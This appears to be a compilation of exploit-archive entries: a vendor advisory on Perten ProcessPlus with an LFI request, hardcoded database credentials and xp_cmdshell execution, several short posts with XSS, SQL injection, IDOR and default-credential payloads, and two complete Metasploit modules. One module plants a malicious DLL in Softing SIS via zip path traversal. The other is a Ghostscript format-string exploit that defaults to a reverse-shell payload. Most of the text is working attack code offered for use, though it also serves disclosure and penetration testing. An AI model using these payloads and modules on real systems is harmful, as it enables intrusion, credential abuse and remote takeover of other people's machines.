<pre><code>CyberDanube Security Research 20240722-0<br />-------------------------------------------------------------------------------<br /> title| Multiple Vulnerabilities<br /> product| Perten Instruments Process Plus Software<br /> vulnerable version| <=1.11.6507.0<br /> fixed version| 2.0.0<br /> CVE number| CVE-2024-6911, CVE-2024-6912, CVE-2024-6913<br /> impact| High<br /> homepage| https://perkinelmer.com<br /> found| 2024-04-24<br /> by| S. Dietz, T. Weber (Office Vienna)<br /> | CyberDanube Security Research<br /> | Vienna | St. Pölten<br /> |<br /> | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"For 85 years, PerkinElmer has pushed the boundaries of science from food to<br />health to the environment. We’ve always pursued science with a clear purpose –<br />to help our customers achieve theirs. Our expert team brings technology and<br />intangibles, like creativity, empathy, diligence, and a spirit of<br />collaboration, in equal measure, to fulfill our customers’ desire to work<br />better, innovate better, and create better.<br /><br />PerkinElmer is a leading, global provider of technology and service solutions<br />that help customers measure, quantify, detect, and report in ways that help<br />ensure the quality, safety, and satisfaction of their products."<br /><br />Source: https://www.perkinelmer.com/<br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />ProcessPlus Software / <=1.11.6507.0<br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Unauthenticated Local File Inclusion (CVE-2024-6911)<br />A LFI was identified in the web interface of the device. An attacker can use<br />this vulnerability to read system-wide files and configuration.<br /><br />2) Hardcoded MSSQL Credentials (CVE-2024-6912)<br />The software is using the same MSSQL credentials across multiple installations.<br />In combination with 3), this allows an attacker to fully compromise the host.<br /><br />3) Execution with Unnecessary Privileges (CVE-2024-6913)<br />The software uses the user "sa" to connect to the database. Access to this<br />account allows an attacker to execute commands via the "xp_cmdshell" procedure.<br /><br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Unauthenticated Local File Inclusion (CVE-2024-6911)<br />The LFI can be triggered by using the following GET Request:<br />-------------------------------------------------------------------------------<br />GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\System32\drivers\etc\hosts&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1<br />Host: 192.168.0.1<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Connection: close<br />Upgrade-Insecure-Requests: 1<br />-------------------------------------------------------------------------------<br />This example returns the content from "C:\Windows\System32\drivers\etc\hosts"<br />of an affected installation.<br /><br />2) Hardcoded MSSQL Credentials (CVE-2024-6912)<br />Analysis across multiple installations show that the configuration file<br />"\ProgramData\Perten\ProcessPlus\OPCDA_SERVER.xml" contains credentials:<br />-------------------------------------------------------------------------------<br />[...]<br /><OPCDA_Server dbconnectstring="Driver={SQL Server};SERVER=.\PertenSQL;<br />DATABASE=ProcessPlus_OPC;UID=sa;PWD=enilno" application_id="1"<br />appid="Perten.OPCDA.Server" loglevel="info"<br />logfile="C:\Perten\ProcessPlus\Log\opcserver.log"><br />[...]<br />-------------------------------------------------------------------------------<br />These credentials "sa:enilno" were re-used in all reviewed installations.<br /><br />3) Execution with Unnecessary Privileges (CVE-2024-6913)<br />The application uses the "sa" user to authenticate with the database. By using<br />Metasploit an attacker can execute arbitrary commands:<br />-------------------------------------------------------------------------------<br />msf6 auxiliary(admin/mssql/mssql_exec) > show options<br /><br />Module options (auxiliary/admin/mssql/mssql_exec):<br /><br /> Name Current Setting<br /> ---- ---------------<br /> CMD dir<br /> PASSWORD enilno<br /> RHOSTS 192.168.0.1<br /> RPORT 1433<br /> TDSENCRYPTION false<br /> TECHNIQUE xp_cmdshell<br /> USERNAME sa<br /> USE_WINDOWS_AUTHENT false<br /><br />msf6 auxiliary(admin/mssql/mssql_exec) > run<br />[*] Running module against 192.168.0.1<br /><br />[*] 192.168.0.1:1433 - SQL Query: EXEC master..xp_cmdshell 'dir'<br /><br />[...]<br /> Directory of C:\Windows\system32<br /> 01/23/2024 13:37 AM <DIR> .<br /> 01/23/2024 13:37 AM <DIR> ..<br /> 01/23/2024 13:37 AM <DIR> 0123<br /> 01/23/2024 13:37 AM <DIR> 0123<br /> 01/23/2024 13:37 AM 232 @AppHelpToast.png<br /> 01/23/2024 13:37 AM 308 @AudioToastIcon.png<br />[...]<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />Update to version 2.0.0.<br /><br />Workaround<br />-------------------------------------------------------------------------------<br />Restrict network access to the host with the installed software. Change the<br />default credentials of the database in the config file and the database itself.<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />CyberDanube recommends Perten customers to upgrade the software to the latest<br />version available and to restrict network access to the management interface.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2024-04-29: Contacting PerkinElmer via dpo@perkinelmer.com.<br />2024-05-13: Vendor asked for unencrypted advisory.<br />2024-05-16: Sent advisory to vendor.<br />2024-05-22: Asked for status update. No answer.<br />2024-05-28: Asked for status update. Contact stated that they are working on a<br /> fix.<br />2024-06-10: Asked for status update. Contact stated that all issues should be<br /> fixed by end of month. Local file inclusion should be fixed in<br /> version 1.16. Asked for a release date of version 1.16. No answer.<br />2024-07-13: Asked for status update.<br />2024-07-15: Contact stated, that all three issues have been fixed in version<br /> 2.0.0 which have been released on 2024-07-11.<br />2024-07-16: Asked for a link to the firmware update release.<br />2024-07-17: Set release date to 2024-07-22.<br />2024-07-22: Coordinated release of security advisory.<br /><br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF S. Dietz, T. Weber / @2024<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : LMS ZAI v6.1 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://codecanyon.net/item/lmszai-learning-management-system/38383087 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin@gmail.com & pass = 123456<br /><br />[+] https://www/127.0.0.1/www.mylmsin/admin/dashboard<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Quick Job v2.4 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://bylancer.com/demo/quickjob/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.<br /><br />[+] use payload : //admin/header.php<br /><br />[+] https://www/127.0.0.1/newjobcartcom/admin/header.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : PPDB ONLINE V.1.3 HTML Form in redirect page Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://berkas.siap-ppdb.com/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Vulnerability description :<br /><br /><br />An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302.<br /> Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. <br /><br />Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example: <br /><?php<br /> if (!isset($_SESSION["authenticated"])) {<br /> header("Location: auth.php");<br /> }<br />?><br /><title>Administration page</title><br /><form action="/admin/action" method="post"><br /> <!-- ... form inputs ... --><br /></form><br /> <br /><!-- ... the rest of the administration page ... --><br />This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability. <br />The correct code would be <br /><br /><?php<br /> if (!isset($_SESSION[auth])) {<br /> header("Location: auth.php");<br /> exit();<br /> }<br />?><br /><title>Administration page</title><br /><form action="/admin/action" method="post"><br /> <!-- ... form inputs ... --><br /></form><br /> <br /><!-- ... the rest of the administration page ... --><br /><br />[+] infected item : /pass. <br /><br />[+] Attack details :<br /><br />Form action=''<br /><br />GET /pass/ HTTP/1.1<br />Pragma: no-cache<br />Cache-Control: no-cache<br />Referer: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/pass<br />Acunetix-Aspect: enabled<br />Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c<br />Acunetix-Aspect-Queries: filelist;aspectalerts<br />Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f<br />Host: elearning7.smpn49-jkt.sch.id<br />Connection: Keep-alive<br />Accept-Encoding: gzip,deflate<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21<br />Accept: */*<br /><br />Response<br />HTTP/1.1 302 Found<br />Connection: Keep-Alive<br />Keep-Alive: timeout=5, max=100<br />x-powered-by: PHP/7.3.33<br />location: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/login.php<br />content-type: text/html; charset=UTF-8<br />content-length: 16992<br />vary: Accept-Encoding,User-Agent<br />date: Fri, 19 Jul 2024 10:09:49 GMT<br />server: LiteSpeed<br />cache-control: no-cache, no-store, must-revalidate, max-age=0<br />platform: hostinger<br />strict-transport-security: max-age=31536000; includeSubDomains; preload<br />x-xss-protection: 1; mode=block<br />x-content-type-options: nosniff<br />Original-Content-Encoding: gzip<br /><br />[+] The impact of this vulnerability : depends on the affected web application.<br /><br />[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page<br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : PHP MaXiMuS v2.5.2 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://php-maximus.fr/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt><br /><br />[+] https://www/127.0.0.1/zmasterfr/modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt><br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : NUKE SENTINEL v2.5.2 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://www.ravenphpscripts.com/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt><br /><br />[+] https://www/127.0.0.1/zmasterfr/modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt><br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Minfotech CMS v2.0 Sql injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://minfotech.in/AboutUs |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /project_list?name=stretch_films <===== inject here<br /><br />[+] https://www/127.0.0.1/shivexportnavsaricom/project_list?name=stretch_films<br /><br />[+] Login : /admin/<br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : eDesign CMS v2.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://gico.io/agop/demos/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.<br /><br />[+] use payload : /admin/register<br /><br />[+] https://www/127.0.0.1/yenpresscom/admin/register<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'zip'<br />require 'metasploit/framework/login_scanner/softing_sis'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Softing Secure Integration Server v1.22 Remote Code Execution',<br /> 'Description' => %q{<br /> This module chains two vulnerabilities (CVE-2022-1373 and CVE-2022-2334) to achieve authenticated remote code execution against Softing Secure Integration Server v1.22.<br /><br /> In CVE-2022-1373, the restore configuration feature is vulnerable to a directory traversal vulnerablity when processing zip files. When using the "restore configuration" feature to upload a zip file containing a path traversal file which is a dll called ..\..\..\..\..\..\..\..\..\..\..\Windows\System32\wbem\wbemcomn.dll. This causes the file C:\Windows\System32\wbem\wbemcomn.dll to be created and executed upon touching the disk.<br /><br /> In CVE-2022-2334, the planted wbemcomn.dll is used in a DLL hijacking attack when Softing Secure Integration Server restarts upon restoring configuration, which allows us to execute arbitrary code on the target system.<br /><br /> The chain demonstrated in Pwn2Own used a signature instead of a password. The signature was acquired by running an ARP spoofing attack against the local network where the Softing SIS server was located. A username is also required for signature authentication.<br /><br /> A custom DLL can be provided to use in the exploit instead of using the default MSF-generated one. Refer to the module documentation for more details.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Chris Anastasio (muffin) of Incite Team', # discovery<br /> 'Steven Seeley (mr_me) of Incite Team', # discovery<br /> 'Imran E. Dawoodjee <imrandawoodjee.infosec[at]gmail.com>', # msf module<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-1373'],<br /> ['CVE', '2022-2334'],<br /> ['ZDI', '22-1154'],<br /> ['ZDI', '22-1156'],<br /> ['URL', 'https://industrial.softing.com/fileadmin/psirt/downloads/syt-2022-5.html'],<br /> ['URL', 'https://ide0x90.github.io/softing-sis-122-rce/']<br /> ],<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8099,<br /> 'SSL' => false,<br /> 'EXITFUNC' => 'thread',<br /> 'WfsDelay' => 300<br /> },<br /> 'Platform' => 'win',<br /> # the software itself only supports x64, see<br /> # https://industrial.softing.com/products/opc-opc-ua-software-platform/integration-platform/secure-integration-server.html<br /> 'Arch' => [ARCH_X64],<br /> 'Targets' => [<br /> [ 'Windows x64', { 'Arch' => ARCH_X64 } ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2022-07-27',<br /> 'Privileged' => true,<br /> 'Compat' => {<br /> 'Meterpreter' => {<br /> 'Commands' => %w[<br /> stdapi_fs_delete_file<br /> ]<br /> }<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('SIGNATURE', [false, 'Use a username/signature pair instead of username/password pair to authenticate']),<br /> OptString.new('USERNAME', [false, 'The username to specify for authentication.', 'admin']),<br /> OptString.new('PASSWORD', [false, 'The password to specify for authentication', 'admin']),<br /> OptString.new('DLLPATH', [false, 'Custom compiled DLL to use'])<br /> ]<br /> )<br /><br /> self.needs_cleanup = true<br /> end<br /><br /> # this will be updated with the signature from "check"<br /> @signature = nil<br /><br /> # create a checker instance to reuse code from the Softing SIS login bruteforce module<br /> def checker_instance<br /> Metasploit::Framework::LoginScanner::SoftingSIS.new(<br /> configure_http_login_scanner(<br /> host: datastore['RHOSTS'],<br /> port: datastore['RPORT'],<br /> connection_timeout: 5<br /> )<br /> ).dup<br /> end<br /><br /> # check if the generated/provided signature is valid for the specified user<br /> def signature_check(user, signature)<br /> send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => "/runtime/core/user/#{user}/authentication",<br /> 'vars_get' => {<br /> 'User' => user,<br /> 'Signature' => signature<br /> }<br /> })<br /> end<br /><br /> def check<br /> # check the Softing SIS version<br /> softing_version_res = checker_instance.check_setup<br /> unless softing_version_res<br /> return CheckCode::Unknown<br /> end<br /><br /> softing_version = Rex::Version.new(softing_version_res)<br /> print_status("#{peer} - Found Softing Secure Integration Server #{softing_version}")<br /><br /> # the vulnerabilities are to be fixed in version 1.30 according to the Softing advisory<br /> # so we will not continue if the version is not vulnerable<br /> unless softing_version < Rex::Version.new('1.30')<br /> return CheckCode::Safe<br /> end<br /><br /> # if the operator provides a signature, then use that instead of the username and password<br /> if datastore['SIGNATURE']<br /> print_status("#{peer} - Authenticating as user #{datastore['USERNAME']} with signature #{datastore['SIGNATURE']}...")<br /> # send a GET request to /runtime/core/user/<username>/authentication<br /> signature_check_res = signature_check(datastore['USERNAME'], datastore['SIGNATURE'])<br /><br /> # if we cannot connect at this point, we only know that the version is < 1.30<br /> # the system "appears" to be vulnerable<br /> unless signature_check_res<br /> print_error("#{peer} - Connection failed!")<br /> end<br /><br /> # if the signature is correct, 200 OK is returned<br /> if signature_check_res.code == 200<br /> print_good("#{peer} - Signature #{datastore['SIGNATURE']} is valid for user #{datastore['USERNAME']}")<br /> @signature = datastore['SIGNATURE']<br /> else<br /> print_error("#{peer} - Signature #{datastore['SIGNATURE']} is invalid for user #{datastore['USERNAME']}!")<br /> end<br /> # login with username and password<br /> else<br /> # get the authentication token<br /> auth_token = checker_instance.get_auth_token(datastore['USERNAME'])<br /> # generate the signature<br /> @signature = checker_instance.generate_signature(auth_token[:proof], datastore['USERNAME'], datastore['PASSWORD'])<br /> # check the generated signatures' validity<br /> signature_check_res = signature_check(datastore['USERNAME'], @signature)<br /> # if we cannot connect, then the system "appears" to be vulnerable<br /> unless signature_check_res<br /> print_error("#{peer} - Connection failed!")<br /> end<br /><br /> # if the signature is correct, 200 OK is returned<br /> if signature_check_res.code == 200<br /> print_good("#{peer} - Valid credentials provided")<br /> else<br /> print_error("#{peer} - Invalid credentials!")<br /> end<br /> end<br /><br /> # if the version is less than 1.30 it's supposedly vulnerable<br /> # but there is no way to confirm vulnerability existence without actually exploiting<br /> # so instead of "Vulnerable", return "Appears"<br /> CheckCode::Appears<br /> end<br /><br /> def exploit<br /> # did the operator specify a custom DLL? If not...<br /> if datastore['DLLPATH']<br /> # otherwise, just use their provided DLL and assume they compiled everything correctly<br /> # there is no way to check if it's compiled correctly anyway<br /> dll_path = datastore['DLLPATH']<br /> else<br /> # have MSF create the malicious DLL<br /> path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-2334')<br /> datastore['EXE::Path'] = path<br /> datastore['EXE::Template'] = ::File.join(path, 'template_x64_windows.dll')<br /><br /> print_status('Generating payload DLL...')<br /> dll = generate_payload_dll<br /> dll_name = 'wbemcomn.dll'<br /> dll_path = store_file(dll, dll_name)<br /> print_status("Created #{dll_path}")<br /> end<br /><br /> # backup the Softing SIS configuration<br /> print_status("#{peer} - Saving configuration...")<br /> get_config_zip_res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => '/runtime/core/config-download',<br /> 'vars_get' => {<br /> 'User' => datastore['USERNAME'],<br /> 'Signature' => @signature<br /> }<br /> })<br /><br /> # end if we cannot get the configuration for some reason<br /> unless get_config_zip_res<br /> fail_with Failure::Unreachable, "#{peer} - Could not obtain configuration"<br /> end<br /><br /> # status code 200 is the expected response to getting the configuration ZIP<br /> unless get_config_zip_res.code == 200<br /> # for verbosity, save the JSON response<br /> get_config_zip_res_json = get_config_zip_res.get_json_document<br /> vprint_error("#{peer} - #{get_config_zip_res_json}")<br /> fail_with Failure::UnexpectedReply, "#{peer} - Returned code #{get_config_zip_res.code}, could not obtain configuration"<br /> end<br /><br /> # if successful, the body cnotains the configuration ZIP<br /> config_zip = get_config_zip_res.body<br /><br /> # config_download.zip is the name of the configuration ZIP when downloading from the browser<br /> # append a hash based on the peer address to prevent overwriting the config file if there are multiple targets<br /> config_zip_name = "config_download_#{Digest::MD5.hexdigest(peer)}.zip"<br /><br /> # store the config zip file<br /> config_zip_path = store_file(config_zip, config_zip_name)<br /> print_status("Saved configuration to #{config_zip_path}")<br /><br /> # insert the malicious DLL<br /> Zip::File.open(config_zip_path, Zip::File::CREATE) do |zipfile|<br /> zipfile.add('..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\wbem\\wbemcomn.dll', dll_path)<br /> end<br /><br /> # restore the configuration<br /> restore_config_res = send_request_cgi({<br /> 'method' => 'PUT',<br /> 'uri' => '/runtime/core/config-restore',<br /> 'cookie' => "systemLang=en-US; lang=en; User=#{datastore['USERNAME']}; Signature=#{@signature}",<br /> 'vars_get' => {<br /> 'User' => datastore['USERNAME'],<br /> 'Signature' => @signature<br /> },<br /> 'data' => File.read(config_zip_path)<br /> })<br /><br /> # no response<br /> unless restore_config_res<br /> fail_with Failure::Unreachable, "#{peer} - Could not restore configuration!"<br /> end<br /><br /> # bad response<br /> unless restore_config_res.code == 200<br /> # for verbosity, show the JSON response<br /> restore_config_res_json = restore_config_res.get_json_document<br /> vprint_error("#{peer} - #{restore_config_res_json}")<br /> fail_with Failure::UnexpectedReply, "#{peer} - Returned code #{restore_config_res.code}, could not restore configuration!"<br /> end<br /> end<br /><br /> # clean up the planted DLL if the session is meterpreter<br /> def on_new_session(session)<br /> super<br /><br /> unless file_dropper_delete_file(session, 'C:\\Windows\\System32\\wbem\\wbemcomn.dll')<br /> # if the exploit was successful, register the malicious wbemcomn.dll file for cleanup<br /> register_file_for_cleanup('C:\\Windows\\System32\\wbem\\wbemcomn.dll')<br /> end<br /> end<br /><br /> # Store the file in the MSF local directory (/root/.msf4/local/) so it can be used when creating the ZIP file<br /> # literal copypasta from exploits/windows/fileformat/cve_2017_8464_lnk_rce<br /> def store_file(data, filename)<br /> if !::File.directory?(Msf::Config.local_directory)<br /> FileUtils.mkdir_p(Msf::Config.local_directory)<br /> end<br /><br /> if filename && !filename.empty?<br /> fname, ext = filename.split('.')<br /> else<br /> fname = "local_#{Time.now.utc.to_i}"<br /> end<br /><br /> fname = ::File.split(fname).last<br /><br /> fname.gsub!(/[^a-z0-9._-]+/i, '')<br /> fname << ".#{ext}"<br /><br /> path = File.join("#{Msf::Config.local_directory}/", fname)<br /> full_path = ::File.expand_path(path)<br /> File.open(full_path, 'wb') { |fd| fd.write(data) }<br /><br /> full_path.dup<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit<br /><br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::FILEFORMAT<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Ghostscript Command Execution via Format String',<br /> 'Description' => %q{<br /> This module exploits a format string vulnerability in Ghostscript<br /> versions before 10.03.1 to achieve a SAFER sandbox bypass and execute<br /> arbitrary commands. This vulnerability is reachable via libraries such as<br /> ImageMagick.<br /><br /> This exploit only works against Ghostscript versions 10.03.0 and<br /> 10.01.2. Some offsets adjustement will probably be needed to make it<br /> work with other versions.<br /> },<br /> 'Author' => [<br /> 'Thomas Rinsma', # Vuln discovery and PoC<br /> 'Christophe De La fuente' # Metasploit module<br /> ],<br /> 'References' => [<br /> ['CVE', '2024-29510'],<br /> ['URL', 'https://bugs.ghostscript.com/show_bug.cgi?id=707662'],<br /> ['URL', 'https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/']<br /> ],<br /> 'DisclosureDate' => '2024-03-14',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['unix', 'linux', 'win'],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Linux Command',<br /> {<br /> 'Arch' => ARCH_CMD,<br /> 'Platform' => [ 'unix', 'linux' ],<br /> 'DefaultOptions' => {<br /> # Payload is not set automatically when selecting this target.<br /> # Select a x64 fetch payload by default.<br /> 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK],<br /> 'Reliability' => [REPEATABLE_SESSION]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('FILENAME', [true, 'Output Encapsulated PostScript (EPS) file', 'msf.eps']),<br /> OptInt.new('INDEX_OUT_PTR', [true, 'Index of `gp_file *out` on the stack (see the full documentation for details `info -d`)', 5])<br /> ])<br /> end<br /><br /> def exploit<br /> xploit = template.sub('MSF_PAYLOAD', payload.encoded)<br /> xploit = xploit.sub('MSF_IDXOUTPTR', datastore['INDEX_OUT_PTR'].to_s)<br /><br /> file_create(xploit)<br /> print_good('You will need to start a handler for the selected payload first.')<br /> print_good("Example usage with Ghostscript: gs -q -dSAFER -dBATCH -dNODISPLAY #{datastore['FILENAME']}")<br /> print_good("Example usage with ImageMagick: identify #{datastore['FILENAME']}")<br /> end<br /><br /> def template<br /> xploit = File.read(File.join(<br /> Msf::Config.data_directory, 'exploits', 'CVE-2024-29510', 'ghostscript_format_string.eps'<br /> ))<br /><br /> # Remove comments<br /> xploit.gsub!(/\s*% .+$/, '')<br /><br /> # Remove empty lines and lines with a single %<br /> xploit.gsub(/^%?$\n/, '')<br /> end<br /><br />end<br /></code></pre>